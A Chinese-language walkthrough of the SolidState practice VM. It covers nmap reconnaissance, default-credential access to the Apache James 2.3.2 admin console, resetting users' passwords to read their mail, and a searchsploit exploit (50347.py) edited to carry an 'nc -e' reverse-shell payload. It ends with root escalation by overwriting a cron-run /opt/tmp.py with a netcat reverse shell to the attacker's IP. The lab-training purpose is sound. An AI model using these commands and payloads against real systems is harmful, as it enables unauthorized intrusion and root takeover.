SolidState靶机通关教程及提权

H轨迹H2024-12-25 20:46

声明!本文章及工具分享仅仅只是供大家学习交流为主,如有任何触犯法律的行为,均与本人及团队无关!!!

工具链接:https://pan.quark.cn/s/33795a10039c

一、靶机搭建

点击扫描虚拟机

选择靶机使在文件夹即可

建议kali和靶机的网络都使用NAT模式

二、信息收集

1. 扫出ip信息

bash 复制代码 
nmap -sN 192.168.108.0/24

扫描结果:

排除kali自身,即192.168.108.138为靶机ip

2. 查找开放端口和服务信息

bash 复制代码 
nmap 192.168.108.138 -p 1-65535
nmap -sV 192.168.108.138

扫描结果:

可用信息:

22/tcp open ssh

25/tcp open smtp

80/tcp open http

110/tcp open pop3

119/tcp open nntp

4555/tcp open rsip

3. 指纹探测找出系统版本信息

bash 复制代码 
nmap 192.168.108.138 -p 22,25,80,110,119,4555 -sV -sC -O --version-all

结果如下

可用信息:

Linux 3.2-4.9

CPE: cpe:/o:linux:linux_kernel

三、寻找攻击点并攻击

1. 寻找信息

访问开启的web端口,发现4555端口可能存在用户名密码登录

搜索相关漏洞,发现默认账号密码

搜索此漏洞,有两个可以利用的脚本

php 复制代码 
searchsploit JAMES 2.3.2

下载下来备用

php 复制代码 
searchsploit -m 50347.py
python 50347.py -h

利用方式为

php 复制代码 
python 50347.py 靶机ip 攻击机ip 监听端口

2. 尝试攻击

连接此端口,输入账号密码登录

bash 复制代码 
nc 192.168.108.138 4555
help

以上是一个pop3的协议,翻译过来看看

help:显示此帮助信息
listusers:显示现有账户
countusers:显示账户数量
adduser [用户名] [密码]:添加新用户
verify [用户名]:验证指定用户是否存在
deluser [用户名]:删除现有用户
setpassword [用户名] [密码]:设置用户密码
setalias [用户] [别名]:将 ' 用户 ' 的所有邮件本地转发到 ' 别名'
showalias [用户名]:显示用户的当前邮件别名
unsetalias [用户]:取消 ' 用户 ' 的别名
setforwarding [用户名] [邮箱地址]:将用户的邮件转发到另一个邮箱地址
showforwarding [用户名]:显示用户当前的邮件转发设置
unsetforwarding [用户名]:取消转发
user [存储库名]:切换到另一个用户存储库
shutdown:关闭当前 JVM(当 James 作为守护进程运行时很方便)
quit:关闭连接

执行命令

bash 复制代码 
listusers
setpassword 账号名

更改所有账户的密码为1,留着备用

先看看telnet连接后的命令使用,大小写任意

USER: 提供用户名以进行身份验证。
PASS: 提供密码以进行身份验证。
LIST: 列出邮件。
RETR: 查看或下载指定邮件。
DELE: 删除指定邮件。
QUIT: 结束会话。

再看看回显信息

user 用户名: 这是用来输入用户名的命令。
+OK: 服务器确认接收用户名。
pass 密码: 这是用来输入密码的命令。
+OK Welcome 用户名: 服务器确认密码正确,并欢迎用户。
-ERR:表示返回错误
list: 这是一个常见的邮件协议命令,用于列出邮件信息,如邮件数量及其大小。
+OK 1 743: 服务器响应,表示成功获取信息,通常会返回邮件的数量和大小,1代表一个邮件,743代表字节大小

利用telnet命令连接,因为前两个用户并没有邮箱信息,所以就不放截图了,这里看john用户,查看邮件信息

telnet ip
user john
pass 1
retr 1

发现提示我们去看mindy账户,同样的方式访问mindy账户,在第二个邮件里发现登录名和密码

账号:mindy

密码:P@55W0rd1!2@

3. ssh登录并利用

尝试ssh登录

php 复制代码 
ssh mindy@192.168.108.138

-rbash:被限制的bash,此bash命令被限制,按两次tab看看有什么命令可以用

看看etc/passwd里面有什么sh可以利用

可以尝试利用mindy的rbash进行shell反弹

4. 脚本利用

编辑刚才的脚本,修改一下

php 复制代码 
vim 50347.py
pyload = 'nc -e bin/sh 攻击机ip 监听端口'

先执行一下脚本

php 复制代码 
python3 50347.py 192.168.108.138 192.168.108.130 4444

5. 获得完整权限

一个面板执行ssh登录,一个面板监听

成功获得

四、提权

因为是james账户提示的mindy,所以看看进程

发现可疑信息opt文件夹

php 复制代码 
cd opt
ls -ll
cat tmp.py

这个代码的意思是定期删除/tmp目录下的内容

写个反弹shell提权,并开启端口监听

php 复制代码 
echo 'import os; os.system("/bin/nc 192.168.108.130 9999 -e /bin/bash")' > /opt/tmp.py
cat tmp.py
python tmp.py

此时即可获得root权限

相关推荐
安全方案9 小时前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
D1TAsec13 小时前
Powercat 无文件落地执行技巧,你确定不进来看看?
网络安全
文大。14 小时前
2024年广西职工职业技能大赛-Spring
java·spring·网络安全
风间琉璃""14 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行15 小时前
【DSVW】攻防实战全记录
web安全·网络安全
索然无味io17 小时前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
Mitch31120 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.20 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
热门推荐
0119个Web前端交互式3D JavaScript框架和库02ARM学习(31)编译器对overlay方式的支持03玄机平台应急响应—webshell查杀04RAG 实践- Ollama+RagFlow 部署本地知识库05【一文读懂】NTN(非地面网络)技术介绍06(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明07ZZ038 物联网应用与服务赛题第J套08组基轨迹建模 GBTM的介绍与实现(Stata 或 R)09Docker 夺命连环 15 问10VSCode插件 —— Cody AI (免费AI助手!)